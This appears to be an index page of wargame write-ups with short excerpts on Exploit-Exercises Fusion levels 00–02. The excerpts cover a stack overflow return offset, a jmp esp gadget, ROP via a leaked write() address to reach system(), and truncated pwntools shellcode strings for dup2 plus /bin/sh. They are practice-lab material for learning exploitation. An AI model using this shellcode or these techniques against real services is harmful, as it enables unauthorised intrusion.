Wargames

[Reversing.kr] CustomShell
This post is protected.

[Exploit-Exercise] Fusion level02
Fusion Level02
- There is XOR encryption with a random value, so the first step is to recover the XOR table.
- After that it is just ROP: leak the address of write() and compute the address of system() from the offset.
- I just used system(). There is another way to get a shell: execve(). Using execve() would make the payload cleaner and more comfortable to build.
...

[Exploit-Exercise] Fusion level01
Fusion Level01
- NX is still disabled, but ASLR is on.
- Now we can't get the buffer address from the binary.
- All you need is a 'jmp esp' gadget.

from pwn import *

# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x..

[Exploit-Exercise] Fusion level00
Fusion Level00
- There aren't any memory protections, not even NX, so I just used shellcode.
- The service listens on port 20000; be careful with the 'fd'.
- In fix_path(), there is a stack buffer overflow vulnerability.
- RET -> 140 ~ 143

from pwn import *

# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\..

[Reversing.kr] MetroApp
This post is protected.